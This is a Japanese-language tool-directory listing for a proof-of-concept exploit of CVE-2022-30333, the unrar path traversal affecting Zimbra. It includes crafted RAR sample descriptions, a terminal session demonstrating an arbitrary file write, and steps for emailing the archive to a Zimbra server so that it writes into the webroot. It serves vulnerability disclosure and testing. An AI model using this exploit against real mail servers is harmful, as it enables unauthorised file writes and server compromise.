Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-30333-PoC — CVE-2022-30333の概念実証エクスプロイト。Zimbraが使用するunrarにおけるパストラバーサル脆弱性であり、細工されたRARアーカイブを介した任意のファイル書き込みを実証します。 | Kitploit
ツール/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

CVE-2022-30333の概念実証エクスプロイト。Zimbraが使用するunrarにおけるパストラバーサル脆弱性であり、細工されたRARアーカイブを介した任意のファイル書き込みを実証します。

リポジトリを見る
1334年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-30333-POC

CVE-2022-30333 をテストするためのサンプルファイル

  • Sample.rar : Linux でテストしたい場合。展開すると、../../tmp/traversed に trav が作成されます。Sample.rar を展開する前に、ディレクトリ ../../tmp/traversed が存在することを確認してください。

  • exp.rar : Zimbra Mail サーバでテストしたい場合。展開すると、/opt/zimbra/jetty_base/webapps/zimbra/public/ に moo.txt が作成されます。このファイルには https://zimbra_mail_domain/public/moo.txt からアクセスできます。

攻撃手順

Linux でのテスト

root@kitploit:~
mkdir ../../tmp/traversed (unrar の前に宛先フォルダが存在している必要があります)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Zimbra でのテスト

  • メールを作成し、悪意のある rar ファイルを添付して Zimbra のメールアドレスに送信します。この rar ファイルは Amavisd で分析中に展開されます。
  • moo.txt は以下の場所にあるはずです: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt または https://zimbra_mail_domain/public/moo.txt

参考リンク

  1. DEV2SEC のベトナム語ブログ
  2. Sonarsource の英語ブログ
  3. Zimbra における攻撃チェーン構築を支援してくれた mrlihd に特別な感謝を捧げます。
ツールをダウンロード